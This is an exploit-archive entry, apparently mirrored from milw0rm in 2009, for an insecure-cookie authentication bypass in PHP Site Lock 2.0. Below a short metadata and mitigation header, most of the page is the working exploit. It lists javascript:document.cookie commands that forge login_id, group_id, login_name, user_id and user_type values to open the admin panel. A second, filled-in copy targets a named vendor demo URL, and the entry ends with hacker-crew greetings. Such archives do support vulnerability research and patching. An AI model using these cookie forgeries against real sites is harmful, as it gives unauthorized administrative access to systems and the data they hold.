PHP Site Lock 2.0 Insecure Cookie Handling Vuln

vendor:

PHP Site Lock

by:

milw0rm.com

7,5

CVSS

HIGH

Insecure Cookie Handling

264

CWE

Product Name: PHP Site Lock

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:kalptaru_infotech:php_site_lock:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

PHP Site Lock 2.0 Insecure Cookie Handling Vuln

An attacker can exploit this vulnerability by setting the cookie values for login_id, group_id, login_name, user_id and user_type to gain access to the admin panel. The attacker can then use the admin panel to perform malicious activities.

Mitigation:

Ensure that the cookie values are properly validated and sanitized before being used.

Source

Exploit-DB raw data:

-------------------------------------[+]
Homepage:http://www.kalptarudemos.com
Product: PHP Site Lock 2.0
home:www.h4ckf0ru.com

-------------------------------------
PHP Site Lock 2.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------
1)javascript:document.cookie="login_id=0;path=/";
1)javascript:document.cookie="group_id=[id grroup admin];path=/";
2)javascript:document.cookie="login_name=[admin name];path=/";
3)javascript:document.cookie="user_id=[user id ];path=/";
4)javascript:document.cookie="user_type=[admin Type];path=/";
Then Go to url: http://victim/[path]/index.php

demo
----
http://www.kalptarudemos.com/demo/phpsitelock/index.php?page=adminlogin

exploit for dem0
----------------
1)javascript:document.cookie="login_id=0;path=/";
2)javascript:document.cookie="group_id=1;path=/";
3)javascript:document.cookie="login_name=admin;path=/";
4)javascript:document.cookie="user_id=1;path=/";
5)javascript:document.cookie="user_type=admin;path=/";


Note: The operation is not worked by assemble The Information :)
Put it one after one :)
--------------------------------------------------
 Greetz to :
[+] Super_Cristal (My Master) - His0k4- Dos-Dz Team Snakes TeaM
SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone-  ZoRLu
ALL My Friends (Dz)
[+]-------------------------------------[+] 

# milw0rm.com [2009-05-04]